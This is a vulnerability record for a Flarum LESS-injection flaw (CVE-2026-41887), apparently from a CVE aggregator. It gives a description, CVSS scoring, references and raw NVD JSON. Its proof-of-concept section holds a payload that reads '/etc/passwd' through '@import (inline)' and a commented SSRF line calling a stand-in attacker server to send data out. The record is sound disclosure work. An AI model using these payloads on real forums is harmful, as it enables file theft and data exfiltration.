CVE-2026-41887

Description

Flarum is open-source forum software. Prior to versions 1.8.16 and 2.0.0-rc.1, Flarum's patch for CVE-2023-27577 restricted the @import and data-uri() LESS features in the custom_less setting, but the same restriction was never applied to other settings registered as LESS config variables (for example theme_primary_color and theme_secondary_color, as well as any key registered via Extend\Settings::registerLessConfigVar()). Those values are interpolated verbatim into the LESS source at compile time, allowing an authenticated administrator to craft a theme-color value that injects an arbitrary @import directive into the compiled forum.css. Because the underlying LESS parser honours @import (inline) '<path>', an attacker can read arbitrary files reachable by the PHP process (local file inclusion) or trigger outbound HTTP(S) requests (server-side request forgery). This issue has been patched in versions 1.8.16 and 2.0.0-rc.1.

CVSS Details

CVSS Score

4.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Flarum < 1.8.16

Flarum < 2.0.0-rc.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Malicious payload to inject into theme_primary_color setting
// This exploits the LESS compiler to read local files (LFI)
@import (inline) '/etc/passwd';

// Alternatively, for Server-Side Request Forgery (SSRF):
// @import (inline) 'http://attacker-controlled-server/exfiltrate';

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41887
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41887
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41887/
[4] VulDB https://vuldb.com/cve/CVE-2026-41887
[5] https://github.com/flarum/framework/commit/2d90a1f19f0e46f8c7e1b07c48ba74b5e38f8410
[6] https://github.com/flarum/framework/releases/tag/v1.8.16
[7] https://github.com/flarum/framework/releases/tag/v2.0.0-rc.1
[8] https://github.com/flarum/framework/security/advisories/GHSA-xjvc-pw2r-6878
[9] https://github.com/flarum/framework/security/advisories/GHSA-xjvc-pw2r-6878

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41887", "sourceIdentifier": "[email protected]", "published": "2026-05-08T17:16:30.890", "lastModified": "2026-05-08T20:16:30.580", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Flarum is open-source forum software. Prior to versions 1.8.16 and 2.0.0-rc.1, Flarum's patch for CVE-2023-27577 restricted the @import and data-uri() LESS features in the custom_less setting, but the same restriction was never applied to other settings registered as LESS config variables (for example theme_primary_color and theme_secondary_color, as well as any key registered via Extend\\Settings::registerLessConfigVar()). Those values are interpolated verbatim into the LESS source at compile time, allowing an authenticated administrator to craft a theme-color value that injects an arbitrary @import directive into the compiled forum.css. Because the underlying LESS parser honours @import (inline) '<path>', an attacker can read arbitrary files reachable by the PHP process (local file inclusion) or trigger outbound HTTP(S) requests (server-side request forgery). This issue has been patched in versions 1.8.16 and 2.0.0-rc.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/flarum/framework/commit/2d90a1f19f0e46f8c7e1b07c48ba74b5e38f8410", "source": "[email protected]"}, {"url": "https://github.com/flarum/framework/releases/tag/v1.8.16", "source": "[email protected]"}, {"url": "https://github.com/flarum/framework/releases/tag/v2.0.0-rc.1", "source": "[email protected]"}, {"url": "https://github.com/flarum/framework/security/advisories/GHSA-xjvc-pw2r-6878", "source": "[email protected]"}, {"url": "https://github.com/flarum/framework/security/advisories/GHSA-xjvc-pw2r-6878", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}